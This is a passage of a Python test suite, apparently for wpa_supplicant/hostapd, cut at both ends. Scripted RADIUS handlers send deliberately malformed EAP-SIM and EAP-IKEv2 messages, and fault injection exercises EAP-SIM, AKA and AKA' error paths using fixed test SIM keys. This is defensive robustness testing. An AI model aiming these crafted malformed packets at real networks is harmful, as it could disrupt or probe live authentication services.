                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification before auth")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 16384)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification before auth")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 16385)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification with unrecognized non-failure")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification before auth (duplicate)")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Re-authentication (unexpected) with no attributes")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_REAUTHENTICATION,
                               0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Client Error")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CLIENT_ERROR, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unknown subtype")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SIM, 255, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        # Script exhausted; no further responses.
        return None

    srv = start_radius_server(sim_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # One connection attempt per scripted test case group; the handler
        # above advances automatically as packets arrive.
        for i in range(0, 25):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="SIM", identity="1232010000000000",
                           password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            # NOTE(review): iteration 0 apparently does not end in an EAP
            # failure event, so only a short settle delay is used there —
            # confirm against the handler script above.
            if i in [ 0 ]:
                time.sleep(0.1)
            else:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
def test_eap_proto_sim_errors(dev, apdev):
    """EAP-SIM protocol tests (error paths)

    Uses alloc_fail()/fail_test() instrumentation to force memory
    allocation and crypto/RNG failures at specific functions inside the
    wpa_supplicant EAP-SIM peer implementation and verifies that each
    local error path is exercised and handled cleanly.
    """
    check_hlr_auc_gw_support()
    params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], params)
    # Allocation failure during EAP-SIM method initialization
    with alloc_fail(dev[0], 1, "eap_sim_init"):
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="SIM", identity="1232010000000000",
                       password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
                       wait_connect=False)
        ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                               timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()
    # Random-number generation failure during EAP-SIM initialization
    with fail_test(dev[0], 1, "os_get_random;eap_sim_init"):
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="SIM", identity="1232010000000000",
                       password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
                       wait_connect=False)
        ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                               timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()
    # The next cases connect successfully first and then force a failure
    # during server-initiated (EAPOL_REAUTH) fast re-authentication.
    dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                   eap="SIM", identity="1232010000000000",
                   password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
    with fail_test(dev[0], 1, "aes_128_cbc_encrypt;eap_sim_response_reauth"):
        hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
        if ev is None:
            raise Exception("EAP re-authentication did not start")
        wait_fail_trigger(dev[0], "GET_FAIL")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].dump_monitor()
    dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                   eap="SIM", identity="1232010000000000",
                   password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
    with fail_test(dev[0], 1, "os_get_random;eap_sim_msg_add_encr_start"):
        hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
        if ev is None:
            raise Exception("EAP re-authentication did not start")
        wait_fail_trigger(dev[0], "GET_FAIL")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].dump_monitor()
    dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                   eap="SIM", identity="1232010000000000",
                   password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
    with fail_test(dev[0], 1, "os_get_random;eap_sim_init_for_reauth"):
        hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
        if ev is None:
            raise Exception("EAP re-authentication did not start")
        wait_fail_trigger(dev[0], "GET_FAIL")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].dump_monitor()
    dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                   eap="SIM", identity="1232010000000000",
                   password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
    with alloc_fail(dev[0], 1, "eap_sim_parse_encr;eap_sim_process_reauthentication"):
        hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
        if ev is None:
            raise Exception("EAP re-authentication did not start")
        wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].dump_monitor()
    # Allocation failures at (count, function) points during a fresh
    # full authentication attempt; each entry is exercised separately.
    tests = [ (1, "eap_sim_verify_mac;eap_sim_process_challenge"),
              (1, "eap_sim_parse_encr;eap_sim_process_challenge"),
              (1, "eap_sim_msg_init;eap_sim_response_start"),
              (1, "wpabuf_alloc;eap_sim_msg_init;eap_sim_response_start"),
              (1, "=eap_sim_learn_ids"),
              (2, "=eap_sim_learn_ids"),
              (2, "eap_sim_learn_ids"),
              (3, "eap_sim_learn_ids"),
              (1, "eap_sim_process_start"),
              (1, "eap_sim_getKey"),
              (1, "eap_sim_get_emsk"),
              (1, "eap_sim_get_session_id") ]
    for count, func in tests:
        with alloc_fail(dev[0], count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="SIM", identity="1232010000000000",
                           password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
                           erp="1", wait_connect=False)
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
    # Crypto operation failure while parsing encrypted attributes
    tests = [ (1, "aes_128_cbc_decrypt;eap_sim_parse_encr") ]
    for count, func in tests:
        with fail_test(dev[0], count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="SIM", identity="1232010000000000",
                           password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
                           wait_connect=False)
            wait_fail_trigger(dev[0], "GET_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
    # Second AP with protected result indication enabled to reach the
    # notification processing paths.
    params = int_eap_server_params()
    params['eap_sim_db'] = "unix:/tmp/hlr_auc_gw.sock"
    params['eap_sim_aka_result_ind'] = "1"
    hostapd.add_ap(apdev[1]['ifname'], params)
    with alloc_fail(dev[0], 1,
                    "eap_sim_msg_init;eap_sim_response_notification"):
        dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
                       scan_freq="2412",
                       eap="SIM", identity="1232010000000000",
                       phase1="result_ind=1",
                       password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
                       wait_connect=False)
        wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].dump_monitor()
    # Failures while building the notification response during
    # client-initiated re-authentication
    tests = [ "eap_sim_msg_add_encr_start;eap_sim_response_notification",
              "aes_128_cbc_encrypt;eap_sim_response_notification" ]
    for func in tests:
        with fail_test(dev[0], 1, func):
            dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
                           scan_freq="2412",
                           eap="SIM", identity="1232010000000000",
                           phase1="result_ind=1",
                           password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
            dev[0].request("REAUTHENTICATE")
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
            if ev is None:
                raise Exception("EAP method not started on reauthentication")
            time.sleep(0.1)
            wait_fail_trigger(dev[0], "GET_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
    # Allocation failure while parsing the notification during
    # re-authentication
    tests = [ "eap_sim_parse_encr;eap_sim_process_notification_reauth" ]
    for func in tests:
        with alloc_fail(dev[0], 1, func):
            dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
                           scan_freq="2412",
                           eap="SIM", identity="1232010000000000",
                           phase1="result_ind=1",
                           password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
            dev[0].request("REAUTHENTICATE")
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
            if ev is None:
                raise Exception("EAP method not started on reauthentication")
            time.sleep(0.1)
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
def test_eap_proto_aka_errors(dev, apdev):
    """EAP-AKA protocol tests (error paths)

    Forces allocation failures (alloc_fail) and crypto failures
    (fail_test) at specific functions inside the wpa_supplicant EAP-AKA
    peer implementation and verifies each error path is handled cleanly.
    """
    check_hlr_auc_gw_support()
    params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], params)
    # Allocation failure during EAP-AKA method initialization
    with alloc_fail(dev[0], 1, "eap_aka_init"):
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="AKA", identity="0232010000000000",
                       password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
                       wait_connect=False)
        ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                               timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()
    # Allocation failures at (count, function) points during a full
    # authentication attempt; each entry is exercised separately.
    tests = [ (1, "=eap_aka_learn_ids"),
              (2, "=eap_aka_learn_ids"),
              (1, "eap_sim_parse_encr;eap_aka_process_challenge"),
              (1, "wpabuf_dup;eap_aka_add_id_msg"),
              (1, "wpabuf_resize;eap_aka_add_id_msg"),
              (1, "eap_aka_getKey"),
              (1, "eap_aka_get_emsk"),
              (1, "eap_aka_get_session_id") ]
    for count, func in tests:
        with alloc_fail(dev[0], count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="AKA", identity="0232010000000000",
                           password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
                           erp="1", wait_connect=False)
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
    # Second AP with protected result indication enabled to reach the
    # notification processing paths.
    params = int_eap_server_params()
    params['eap_sim_db'] = "unix:/tmp/hlr_auc_gw.sock"
    params['eap_sim_aka_result_ind'] = "1"
    hostapd.add_ap(apdev[1]['ifname'], params)
    with alloc_fail(dev[0], 1,
                    "eap_sim_msg_init;eap_aka_response_notification"):
        dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="AKA", identity="0232010000000000",
                       phase1="result_ind=1",
                       password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
                       wait_connect=False)
        wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].dump_monitor()
    # Failures while building the notification response during
    # client-initiated re-authentication
    tests = [ "eap_sim_msg_add_encr_start;eap_aka_response_notification",
              "aes_128_cbc_encrypt;eap_aka_response_notification" ]
    for func in tests:
        with fail_test(dev[0], 1, func):
            dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
                           scan_freq="2412",
                           eap="AKA", identity="0232010000000000",
                           phase1="result_ind=1",
                           password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123")
            dev[0].request("REAUTHENTICATE")
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
            if ev is None:
                raise Exception("EAP method not started on reauthentication")
            time.sleep(0.1)
            wait_fail_trigger(dev[0], "GET_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
    # Allocation failure while parsing the notification during
    # re-authentication
    tests = [ "eap_sim_parse_encr;eap_aka_process_notification_reauth" ]
    for func in tests:
        with alloc_fail(dev[0], 1, func):
            dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
                           scan_freq="2412",
                           eap="AKA", identity="0232010000000000",
                           phase1="result_ind=1",
                           password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123")
            dev[0].request("REAUTHENTICATE")
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
            if ev is None:
                raise Exception("EAP method not started on reauthentication")
            time.sleep(0.1)
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
def test_eap_proto_aka_prime_errors(dev, apdev):
    """EAP-AKA' protocol tests (error paths)

    Forces allocation/crypto failures at specific points in the
    wpa_supplicant EAP-AKA' peer implementation (identity 6555444333222111,
    eap="AKA'") and verifies each error path is handled cleanly.
    """
    check_hlr_auc_gw_support()
    params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], params)
    # Allocation failure during method initialization (shared eap_aka_init)
    with alloc_fail(dev[0], 1, "eap_aka_init"):
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="AKA'", identity="6555444333222111",
                       password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
                       wait_connect=False)
        ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                               timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()
    # Connect successfully, then force an encryption failure during
    # server-initiated fast re-authentication.
    dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                   eap="AKA'", identity="6555444333222111",
                   password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123")
    with fail_test(dev[0], 1, "aes_128_cbc_encrypt;eap_aka_response_reauth"):
        hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
        if ev is None:
            raise Exception("EAP re-authentication did not start")
        wait_fail_trigger(dev[0], "GET_FAIL")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].dump_monitor()
    # Allocation failure while parsing encrypted attributes during
    # re-authentication
    dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                   eap="AKA'", identity="6555444333222111",
                   password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123")
    with alloc_fail(dev[0], 1, "eap_sim_parse_encr;eap_aka_process_reauthentication"):
        hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
        if ev is None:
            raise Exception("EAP re-authentication did not start")
        wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].dump_monitor()
    # Allocation failures during full authentication challenge processing
    tests = [ (1, "eap_sim_verify_mac_sha256"),
              (1, "=eap_aka_process_challenge") ]
    for count, func in tests:
        with alloc_fail(dev[0], count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="AKA'", identity="6555444333222111",
                           password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
                           erp="1", wait_connect=False)
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
def test_eap_proto_ikev2(dev, apdev):
    """EAP-IKEv2 protocol tests

    Runs a scripted RADIUS server whose handler returns one crafted
    EAP-IKEv2 message per connection attempt (indexed by ctx['num']),
    covering malformed fragmentation, IKEv2 header, SAi1/KEi/Ni payload
    and integrity checksum cases. The driver loop below keeps starting
    new connection attempts until the handler signals completion via the
    eap_proto_ikev2_test_done module-level flag.
    """
    check_eap_capa(dev[0], "IKEV2")
    global eap_proto_ikev2_test_done
    eap_proto_ikev2_test_done = False
    def ikev2_handler(ctx, req):
        # ctx persists across calls: 'num' counts requests (selects the
        # test case), 'id' tracks the EAP identifier to use in replies.
        logger.info("ikev2_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        # idx is incremented before each case so that the Nth connection
        # attempt hits the Nth "if ctx['num'] == idx" block.
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_IKEV2)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated Message Length field")
            return struct.pack(">BBHBB3B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 3,
                               EAP_TYPE_IKEV2, 0x80, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short Message Length value")
            return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4 + 1,
                               EAP_TYPE_IKEV2, 0x80, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated message")
            return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4,
                               EAP_TYPE_IKEV2, 0x80, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated message(2)")
            return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4,
                               EAP_TYPE_IKEV2, 0x80, 0xffffffff)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated message(3)")
            return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4,
                               EAP_TYPE_IKEV2, 0xc0, 0xffffffff)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated message(4)")
            return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4,
                               EAP_TYPE_IKEV2, 0xc0, 10000000)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too long fragments (first fragment)")
            return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4 + 1,
                               EAP_TYPE_IKEV2, 0xc0, 2, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too long fragments (second fragment)")
            return struct.pack(">BBHBB2B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2,
                               EAP_TYPE_IKEV2, 0x00, 2, 3)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No Message Length field in first fragment")
            return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 1,
                               EAP_TYPE_IKEV2, 0x40, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: ICV before keys")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_IKEV2, 0x20)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported IKEv2 header version")
            return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 28,
                               EAP_TYPE_IKEV2, 0x00,
                               0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Incorrect IKEv2 header Length")
            return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 28,
                               EAP_TYPE_IKEV2, 0x00,
                               0, 0, 0, 0,
                               0, 0x20, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected IKEv2 Exchange Type in SA_INIT state")
            return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 28,
                               EAP_TYPE_IKEV2, 0x00,
                               0, 0, 0, 0,
                               0, 0x20, 0, 0, 0, 28)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected IKEv2 Message ID in SA_INIT state")
            return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 28,
                               EAP_TYPE_IKEV2, 0x00,
                               0, 0, 0, 0,
                               0, 0x20, 34, 0, 1, 28)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected IKEv2 Flags value")
            return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 28,
                               EAP_TYPE_IKEV2, 0x00,
                               0, 0, 0, 0,
                               0, 0x20, 34, 0, 0, 28)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected IKEv2 Flags value(2)")
            return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 28,
                               EAP_TYPE_IKEV2, 0x00,
                               0, 0, 0, 0,
                               0, 0x20, 34, 0x20, 0, 28)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No SAi1 in SA_INIT")
            return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 28,
                               EAP_TYPE_IKEV2, 0x00,
                               0, 0, 0, 0,
                               0, 0x20, 34, 0x08, 0, 28)
        # Helper: wrap an IKEv2 payload in an EAP-Request/IKEv2 message
        # with a well-formed IKEv2 header (version 0x20, exchange type 34
        # IKE_SA_INIT by default).
        def build_ike(id, next=0, exch_type=34, flags=0x00, ike=''):
            return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, id,
                               4 + 1 + 1 + 28 + len(ike),
                               EAP_TYPE_IKEV2, flags,
                               0, 0, 0, 0,
                               next, 0x20, exch_type, 0x08, 0,
                               28 + len(ike)) + ike
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected extra data after payloads")
            return build_ike(ctx['id'], ike=struct.pack(">B", 1))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated payload header")
            return build_ike(ctx['id'], next=128, ike=struct.pack(">B", 1))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too small payload header length")
            ike = struct.pack(">BBH", 0, 0, 3)
            return build_ike(ctx['id'], next=128, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too large payload header length")
            ike = struct.pack(">BBH", 0, 0, 5)
            return build_ike(ctx['id'], next=128, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported payload (non-critical and critical)")
            ike = struct.pack(">BBHBBH", 129, 0, 4, 0, 0x01, 4)
            return build_ike(ctx['id'], next=128, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Certificate and empty SAi1")
            ike = struct.pack(">BBHBBH", 33, 0, 4, 0, 0, 4)
            return build_ike(ctx['id'], next=37, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short proposal")
            ike = struct.pack(">BBHBBHBBB", 0, 0, 4 + 7,
                              0, 0, 7, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too small proposal length in SAi1")
            ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
                              0, 0, 7, 0, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too large proposal length in SAi1")
            ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
                              0, 0, 9, 0, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected proposal type in SAi1")
            ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
                              1, 0, 8, 0, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected Protocol ID in SAi1")
            ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
                              0, 0, 8, 0, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected proposal number in SAi1")
            ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
                              0, 0, 8, 0, 1, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Not enough room for SPI in SAi1")
            ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
                              0, 0, 8, 1, 1, 1, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected SPI in SAi1")
            ike = struct.pack(">BBHBBHBBBBB", 0, 0, 4 + 9,
                              0, 0, 9, 1, 1, 1, 0, 1)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No transforms in SAi1")
            ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
                              0, 0, 8, 1, 1, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short transform in SAi1")
